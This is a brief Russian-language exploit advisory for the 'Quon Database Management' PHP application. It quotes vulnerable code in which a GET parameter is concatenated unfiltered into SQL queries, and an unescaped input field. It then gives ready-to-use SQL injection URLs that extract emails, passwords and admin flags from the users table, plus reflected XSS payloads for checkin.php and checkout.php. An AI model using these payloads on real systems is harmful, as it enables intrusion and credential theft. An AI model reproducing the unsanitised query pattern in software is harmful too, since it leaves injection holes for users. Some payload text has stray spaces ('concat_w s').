Программа: Quon Database Management
Описание: недостаточная фильтрация входяших данных, sql injection & xss
Уязвимый код:
moviepage.php
Код:
$query = "SELECT * FROM movie WHERE id=" . $_GET['id'];
$result = @mysql_query($query);
exploit: www.example.com/moviepage.php?id=1+union+select+1,2,3,4,5,concat_w s(0x3a,email,password,admin),7,8+from+users
barcode.php
Код:
$query = "SELECT * FROM movie WHERE id=" . $_GET['id'];
$result = @mysql_query($query);
$row = @mysql_fetch_array($result);
exploit: www.example.com/barcode.php?id=-1+union+select+email,2,password,4,5,6,7,8+from+use rs
checkin.php
Код:
<INPUT TYPE="text" name="check" id="check" value="<?php echo $getid;?>">
exploit:www.example.com/checkout.php?id=1%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
exploit:www.example.com/checkin.php?id=xss%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
©trumpcode.org